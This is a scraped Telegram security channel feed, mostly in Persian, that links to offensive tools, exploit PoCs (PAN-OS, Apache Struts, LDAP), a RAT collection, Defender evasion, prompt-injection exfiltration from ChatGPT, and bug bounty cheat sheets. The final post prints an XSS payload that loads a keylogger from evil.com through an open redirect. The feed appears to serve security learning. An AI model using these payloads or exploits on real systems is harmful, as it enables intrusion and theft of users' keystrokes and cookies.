⚙️ All in One Hacking tools ( Hackingtool )
🔬شامل مواردی نظیر...
- Anonymously Hiding Tools;
- Information gathering tools;
- Wordlist Generator;
- Wireless attack tools;
- SQL Injection Tools;
- Phishing attack tools;
- Web Attack tools;
- Post exploitation tools;
- Forensic tools;
- Payload creation tools;
- Exploit framework;
- Reverse engineering tools;
- DDOS Attack Tools;
- Remote Administrator Tools (RAT);
- XSS Attack Tools;
- Steganograhy tools;
- SocialMedia Bruteforce;
- Android Hacking tools;
- IDN Homograph Attack;
- Email Verify tools;
- Hash cracking tools;
- Wifi Deauthenticate;
- SocialMedia Finder;
- Payload Injector;
- Web crawling;
- Mix tools.
🌐 https://github.com/Z4nzu/hackingtool
#tools
#pentest
@iDeFense
🔬شامل مواردی نظیر...
- Anonymously Hiding Tools;
- Information gathering tools;
- Wordlist Generator;
- Wireless attack tools;
- SQL Injection Tools;
- Phishing attack tools;
- Web Attack tools;
- Post exploitation tools;
- Forensic tools;
- Payload creation tools;
- Exploit framework;
- Reverse engineering tools;
- DDOS Attack Tools;
- Remote Administrator Tools (RAT);
- XSS Attack Tools;
- Steganograhy tools;
- SocialMedia Bruteforce;
- Android Hacking tools;
- IDN Homograph Attack;
- Email Verify tools;
- Hash cracking tools;
- Wifi Deauthenticate;
- SocialMedia Finder;
- Payload Injector;
- Web crawling;
- Mix tools.
🌐 https://github.com/Z4nzu/hackingtool
#tools
#pentest
@iDeFense
GitHub
GitHub - Z4nzu/hackingtool: ALL IN ONE Hacking Tool For Hackers
ALL IN ONE Hacking Tool For Hackers. Contribute to Z4nzu/hackingtool development by creating an account on GitHub.
👍6❤1
🛡 Palo Alto PAN-OS Pre-Auth RCE Chain (CVE-2024-0012 & CVE-2024-9474)
⭕️ یک زنجیره آسیبپذیری حیاتی در Palo Alto PAN-OS، ترکیبی از یک بای پس احراز هویت (CVE-2024-0012) و یک RCE (CVE-2024-9474) در رابط وب مدیریت، به مهاجمان تایید نشده اجازه میدهد تا کد دلخواه را با روت اجرا کنند
🛠 نسخه های تحت تاثیر:
- PAN-OS 11.2 (تا و شامل 11.2.4-h1)
- PAN-OS 11.1 (تا و شامل 11.1.5-h1)
- PAN-OS 11.0 (تا و شامل 11.0.6-h1)
- PAN-OS 10.2 (تا و شامل 10.2.12-h2)
🔗 Research:
https://labs.watchtowr.com/pots-and-pans-ssl-vpn-palo-alto-pan-os-cve-2024-0012-cve-2024-9474/
🔗 PoC:
https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012
🔗 Exploit:
https://github.com/Chocapikk/CVE-2024-9474
#paloalto
#RCE
#CVE
@iDeFense
⭕️ یک زنجیره آسیبپذیری حیاتی در Palo Alto PAN-OS، ترکیبی از یک بای پس احراز هویت (CVE-2024-0012) و یک RCE (CVE-2024-9474) در رابط وب مدیریت، به مهاجمان تایید نشده اجازه میدهد تا کد دلخواه را با روت اجرا کنند
🛠 نسخه های تحت تاثیر:
- PAN-OS 11.2 (تا و شامل 11.2.4-h1)
- PAN-OS 11.1 (تا و شامل 11.1.5-h1)
- PAN-OS 11.0 (تا و شامل 11.0.6-h1)
- PAN-OS 10.2 (تا و شامل 10.2.12-h2)
🔗 Research:
https://labs.watchtowr.com/pots-and-pans-ssl-vpn-palo-alto-pan-os-cve-2024-0012-cve-2024-9474/
🔗 PoC:
https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012
🔗 Exploit:
https://github.com/Chocapikk/CVE-2024-9474
#paloalto
#RCE
#CVE
@iDeFense
GitHub
GitHub - watchtowrlabs/palo-alto-panos-cve-2024-0012
Contribute to watchtowrlabs/palo-alto-panos-cve-2024-0012 development by creating an account on GitHub.
👍5
🔎 وبسایت Weakpass مجموعه ای از لیست های رمز عبور برای اهداف مختلف از تست نفوذ گرفته تا بهبود امنیت رمز عبور را ارائه میدهد که بهصورت تخصصی برای ارزیابی امنیتی طراحی شدهاند
📖 این منبع شامل انواع دیکشنریها برای تحلیل و حملات رمزنگاری است که دسترسی به آنها بهصورت کاملاً رایگان و بدون محدودیت ارائه میشود
📌 از ویژگی های این سایت، اینکه جستجوها کاملاً در سمت کلاینت انجام میشود و هیچ دادهای به سرور ارسال نمیگردد، که این امر امنیت و حریم خصوصی کاربر را تضمین میکند.
📌 همچنین این سایت API پیشرفتهای برای ادغام آسان در ابزارها و فرآیندهای امنیتی دارد و امکان دانلود کل دیکشنریها را فراهم کرده است. به این ترتیب، متخصصان امنیت میتوانند این دیکشنریها را برای کنترل کیفیت رمز عبورها و اطمینان از تطابق با سیاستهای امنیتی داخلی سازمانها بهکار گیرند
🌐 https://weakpass.com/
#Bruteforce
@iDeFense
📖 این منبع شامل انواع دیکشنریها برای تحلیل و حملات رمزنگاری است که دسترسی به آنها بهصورت کاملاً رایگان و بدون محدودیت ارائه میشود
📌 از ویژگی های این سایت، اینکه جستجوها کاملاً در سمت کلاینت انجام میشود و هیچ دادهای به سرور ارسال نمیگردد، که این امر امنیت و حریم خصوصی کاربر را تضمین میکند.
📌 همچنین این سایت API پیشرفتهای برای ادغام آسان در ابزارها و فرآیندهای امنیتی دارد و امکان دانلود کل دیکشنریها را فراهم کرده است. به این ترتیب، متخصصان امنیت میتوانند این دیکشنریها را برای کنترل کیفیت رمز عبورها و اطمینان از تطابق با سیاستهای امنیتی داخلی سازمانها بهکار گیرند
🌐 https://weakpass.com/
#Bruteforce
@iDeFense
❤🔥1👍1
iDeFense
با سلام خدمت دوستان عزیز به اطلاع میرساند : تیم تحقیقاتی آی دیفنس از بین افراد فعال و با انگیزه عضو جدید میپذیرد: ⏳شرایط عضویت 💡درک زبان انگلیسی در حد قابل قبول ✅پویا و با انگیزه و همچنین دوستانی که تمایل به مطالعه کتاب های حوزه امنیت سایبری دارند میتوانند…
اگر متن رو نخوندید مجدد ببینید 😇
🗿3👍1
💢 A tool used to generate a wordlist from user input, in order to use for password dictionary attacks
👁🗨 https://github.com/flashnuke/pass-generator
#Bruteforce
@iDeFense
👁🗨 https://github.com/flashnuke/pass-generator
#Bruteforce
@iDeFense
👍7
🦠 Ultimate RAT Collection
🔬 https://codesandbox.io/p/github/sorokinvld/Ultimate-RAT-Collection
⚠️ توجه : این ابزارها فقط برای اهداف آموزشی است و ما مسئولیتی در قبال هرگونه سوء استفاده یا فعالیت غیرقانونی نداریم
#Rat
#Malware
#Malware_Analysis
#Reverse_engineering
@iDeFense
🔬 https://codesandbox.io/p/github/sorokinvld/Ultimate-RAT-Collection
⚠️ Note: I am not responsible for any problems you may encounter.
⚠️ You run and download these samples at your own risk.
⚠️ You agree by downloading to use every sample lawfully and for research only.
⚠️ توجه : این ابزارها فقط برای اهداف آموزشی است و ما مسئولیتی در قبال هرگونه سوء استفاده یا فعالیت غیرقانونی نداریم
#Rat
#Malware
#Malware_Analysis
#Reverse_engineering
@iDeFense
👍3⚡1🔥1
📚 راهنمای آموزنده برای شروع Bug Bounty، که شامل ابزارهای مفید، آزمایشگاه ها، تحقیقات، موارد واقعی و بسیاری از پیوندهای مفید در این زمینه است...
🌐 https://blog.securitybreached.org/2023/08/18/bug-bounty-blueprint-a-beginners-guide/
#Bug_Bounty
@iDeFense
🌐 https://blog.securitybreached.org/2023/08/18/bug-bounty-blueprint-a-beginners-guide/
#Bug_Bounty
@iDeFense
Security Breached Blog
Bug Bounty Blueprint: A Beginner's Guide
This guide is a must-read for beginners to dive into Bug Bounty Hunting. It provides foundational skills, tips, tools, and resources for Bug Bounty Hunters. I've covered various aspects including vulnerabilities and learning resources. Are you ready to embark…
🤩4✍1
♨️ Making a Powershell Shellcode Downloader that Evades Defender (Without Amsi Bypass)
🌐 https://medium.com/@luisgerardomoret_69654/making-a-powershell-shellcode-downloader-that-evades-defender-without-amsi-bypass-d2cf13f18409
#Bypass
#RedTeam
#Defense_Evasion
@iDeFense
🌐 https://medium.com/@luisgerardomoret_69654/making-a-powershell-shellcode-downloader-that-evades-defender-without-amsi-bypass-d2cf13f18409
#Bypass
#RedTeam
#Defense_Evasion
@iDeFense
Medium
Making a Powershell Shellcode Downloader that Evades Defender (Without Amsi Bypass)
Hello everyone, today i’m going to show how to modify a powershell shellcode runner to download shellcode and run it while also evading…
♨️ Exfiltration of personal information from ChatGPT via prompt
injection
📚 https://arxiv.org/pdf/2406.00199
⚠️ DATA EXFILTRATION TECHNIQUES FOR CHATGPT
#POC
👁🗨 https://github.com/R3DRUN3/sploitcraft/tree/main/llm/data-exfiltration/chat-gpt
#ChatGPT
#EXFILTRATION
@iDeFense
injection
📚 https://arxiv.org/pdf/2406.00199
⚠️ DATA EXFILTRATION TECHNIQUES FOR CHATGPT
#POC
👁🗨 https://github.com/R3DRUN3/sploitcraft/tree/main/llm/data-exfiltration/chat-gpt
#ChatGPT
#EXFILTRATION
@iDeFense
سلام ؛ میزبان ارائه ها و مطالب و محتوای آموزشی شما در راستای ارتقا سطح سواد امنیتی در آیدیفنس هستیم ؛ برای انتشار مطالب و همچنین برای عضویت در تیم های فعال مجموعه با پشتیبانی در ارتباط باشید
@iDeFense_Tester
@iDeFense_Tester
🤝4💯3❤1🤷♂1
@idefense.gif
96.6 MB
🔺 Introduction to Windows Kernel Exploitation
👁🗨 https://wetw0rk.github.io/posts/0x00-introduction-to-windows-kernel-exploitation/
♨️ Killing Windows Kernel Mitigations (Windows 11 pro)
👁🗨 https://wetw0rk.github.io/posts/0x01-killing-windows-kernel-mitigations/
#kernel
#exploit
#Privilege_escalation
@iDeFense
👁🗨 https://wetw0rk.github.io/posts/0x00-introduction-to-windows-kernel-exploitation/
♨️ Killing Windows Kernel Mitigations (Windows 11 pro)
👁🗨 https://wetw0rk.github.io/posts/0x01-killing-windows-kernel-mitigations/
#kernel
#exploit
#Privilege_escalation
@iDeFense
👍2❤🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
‼️وقتی تصمیم می گیرید که فقط رویدادهای امنیتی اساسی رو بررسی کنید...😬
#fun
#SOC
#Critical_Alert
#BlueTeam
@iDeFense
#fun
#SOC
#Critical_Alert
#BlueTeam
@iDeFense
😁8👻1🙈1
🚨 CVE-2024-53677-S2-067🚨
💢 CVSS Score: 9.5 (Critical)
Apache Struts versions 2.0.0 <= 2.5.33 & 6.0.0 <= 6.3.0.2
🛟 The issue has been resolved in Apache Struts 6.4.0 and later versions
‼️ CVE-2024-53677 is a critical vulnerability that allows attackers to exploit weaknesses in the file upload mechanism of Apache Struts. By manipulating the file upload parameters, an attacker can achieve the following:
⚠️ Path Traversal: Upload files to arbitrary locations within the server, bypassing security mechanisms.
⚠️ Remote Code Execution (RCE): Execute malicious code by uploading and triggering executable files, such as .jsp scripts or binary payloads.
🔰 According to the Apache Struts advisory, the vulnerability is not backward-compatible with older file upload mechanisms. As such, organizations using the deprecated file upload method must rewrite their actions to adopt the new, secure mechanism introduced in version 6.4.0.
🔬 POC : https://github.com/TAM-K592/CVE-2024-53677-S2-067
#CVE
#Apache
#RCE
@iDeFense
💢 CVSS Score: 9.5 (Critical)
Apache Struts versions 2.0.0 <= 2.5.33 & 6.0.0 <= 6.3.0.2
🛟 The issue has been resolved in Apache Struts 6.4.0 and later versions
‼️ CVE-2024-53677 is a critical vulnerability that allows attackers to exploit weaknesses in the file upload mechanism of Apache Struts. By manipulating the file upload parameters, an attacker can achieve the following:
⚠️ Path Traversal: Upload files to arbitrary locations within the server, bypassing security mechanisms.
⚠️ Remote Code Execution (RCE): Execute malicious code by uploading and triggering executable files, such as .jsp scripts or binary payloads.
🔰 According to the Apache Struts advisory, the vulnerability is not backward-compatible with older file upload mechanisms. As such, organizations using the deprecated file upload method must rewrite their actions to adopt the new, secure mechanism introduced in version 6.4.0.
🔬 POC : https://github.com/TAM-K592/CVE-2024-53677-S2-067
#CVE
#Apache
#RCE
@iDeFense
GitHub
GitHub - TAM-K592/CVE-2024-53677-S2-067: A critical vulnerability, CVE-2024-53677, has been identified in the popular Apache Struts…
A critical vulnerability, CVE-2024-53677, has been identified in the popular Apache Struts framework, potentially allowing attackers to execute arbitrary code remotely. This vulnerability arises fr...
❤🔥3🤔3🏆1🗿1
عزیزانی که علاقه مند به تولید محتوای ویدیویی و همچنین علاقه مند به پژوهش هستند جهت عضویت در گروه درخواست بدن
@iDeFense_Tester
@iDeFense_Tester
❤7🗿3
iDeFense
عزیزانی که علاقه مند به تولید محتوای ویدیویی و همچنین علاقه مند به پژوهش هستند جهت عضویت در گروه درخواست بدن @iDeFense_Tester
اینبار در شاخه های مختلف(کد نویسی امن ؛ رد تیمینگ ؛ باینری) و مختص اسیب پذیری های وب نیست
🎄6🗿2
😈 [ Eliran Nissan @eliran_nissan ]
I am excited to share with you my latest research - "DCOM Upload & Execute".
An advanced lateral movement technique to upload and execute custom payloads on remote targets.
Forget about PSEXEC and dive in!
Blog:
🔗 https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor
Code:
🔗 https://github.com/deepinstinct/DCOMUploadExec
[ tweet ]
I am excited to share with you my latest research - "DCOM Upload & Execute".
An advanced lateral movement technique to upload and execute custom payloads on remote targets.
Forget about PSEXEC and dive in!
Blog:
🔗 https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor
Code:
🔗 https://github.com/deepinstinct/DCOMUploadExec
[ tweet ]
Deep Instinct
Forget PSEXEC: DCOM Upload & Execute Backdoor
Join Deep Instinct Security Researcher Eliran Nissan as he exposes a powerful new DCOM lateral movement attack that remotely writes custom payloads to create an embedded backdoor.
🔥6
Exploit for Windows Kernel-Mode Driver Elevation of Privilege Flaw (CVE-2024-35250)
This security flaw is due to an untrusted pointer dereference weakness that allows local attackers to gain SYSTEM privileges in low-complexity attacks that don't require user interaction.
This security flaw is due to an untrusted pointer dereference weakness that allows local attackers to gain SYSTEM privileges in low-complexity attacks that don't require user interaction.
👍4
🔖Bug Bounty CheatSheet
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
#pentestin #bugbounty #Tools
@iDeFense
🔴XSS
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴SQLi
🔘 Github: 🔗Link
🔴SSRF
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴CRLF
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴CSV-Injection
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴Command Injection
🔘 Github: 🔗Link
🔴Directory Traversal
🔘 Github: 🔗Link
🔴LFI
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴XXE
🔘 Github: 🔗Link
🔴Open-Redirect
🔘 Github: 🔗Link
🔴RCE
🔘 Github: 🔗Link
🔴Crypto
🔘 Github: 🔗Link
🔴Template Injection
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴XSLT
🔘 Github: 🔗Link
🔴Content Injection
🔘 Github: 🔗Link
🔴LDAP Injection
🔘 Github: 🔗Link
🔴NoSQL Injection
🔘 Github: 🔗Link
🔴CSRF Injection
🔘 Github: 🔗Link
🔴GraphQL Injection
🔘 Github: 🔗Link
🔴IDOR
🔘 Github: 🔗Link
🔴ISCM
🔘 Github: 🔗Link
🔴LaTex Injection
🔘 Github: 🔗Link
🔴OAuth
🔘 Github: 🔗Link
🔴XPATH Injection
🔘 Github: 🔗Link
🔴Bypass Upload Tricky
🔘 Github: 🔗Link
#pentestin #bugbounty #Tools
@iDeFense
👍6
♨ AttackRuleMap
🔺 پروژه مپ Atomic Red Team بر روی
🔘 Splunk ESCU ( در حال تکمیل/فعلا ویندوز )
🔘 Sigma Rules
🔗 https://attackrulemap.netlify.app/
#sigma
#Splunk
#ESCU
#BlueTeam
#SOC
@iDeFense
🔺 پروژه مپ Atomic Red Team بر روی
🔘 Splunk ESCU ( در حال تکمیل/فعلا ویندوز )
🔘 Sigma Rules
🔗 https://attackrulemap.netlify.app/
#sigma
#Splunk
#ESCU
#BlueTeam
#SOC
@iDeFense
attackrulemap.netlify.com
ARM - AttackRuleMap
Mapping of open-source detection rules and atomic tests.
❤4
This media is not supported in your browser
VIEW IN TELEGRAM
👁🗨UPDATED
💢 CVE-2024-49112 : Windows Lightweight Directory Access Protocol - Remote Code Execution (AKA : LDAP Nightmare)
( The RCE vulnerability was assigned as CVE-2024-49112 and was given the CVSS severity score of 9.8 out of 10 )
♨️ cve-2024-49113 : the DOS vulnerability was assigned CVE-2024-49113
Windows 10 Version 1607 (both 32-bit and x64-based) up to 10.0.14393.7606
Windows Server 2012
Windows Server 2016
Windows Server 2019
Windows Server 2022
Windows 11 22H2
Windows Server 2022 23H2
Windows 11 24H2
Windows Server 2025
🚩 POC : https://github.com/SafeBreach-Labs/CVE-2024-49112
♨️ Blog : https://www.safebreach.com/blog/ldapnightmare-safebreach-labs-publishes-first-proof-of-concept-exploit-for-cve-2024-49113/
#RCE
#LDAP
#Active_Directory
#CVE
#DOS
@iDeFense
🔥4👍1
🕳 A Simple JS code to keylogger data and send it to the personal server + svg file to send the (document.cookie)
💣 https://github.com/11whoami99/XSS-keylogger
📝 USES :
📚 در یک وبسایت آسیبپذیر xss، ممکن است پارامتر domain یا مشابه آن بهصورت مستقیم در redirect استفاده شود:
مهاجم لینک زیر را میسازد:
#XSS
#Open_Redirect
#keylogger
#web
@iDeFense
💣 https://github.com/11whoami99/XSS-keylogger
📝 USES :
The Keylogger in something like XSS Via OpenRedirect in Login Page :
==> ?domain=javascript%3aimport(//evil.com/xss.js)
📚 در یک وبسایت آسیبپذیر xss، ممکن است پارامتر domain یا مشابه آن بهصورت مستقیم در redirect استفاده شود:
🔬https://example.com/redirect?domain=https://legit-site.com
مهاجم لینک زیر را میسازد:
🔬https://example.com/redirect?domain=javascript:import(//evil.com/xss.js)
#XSS
#Open_Redirect
#keylogger
#web
@iDeFense
GitHub
GitHub - 11whoami99/XSS-keylogger: A Simple JS code to keylogger data and send it to the personal server
A Simple JS code to keylogger data and send it to the personal server - 11whoami99/XSS-keylogger
👍5⚡1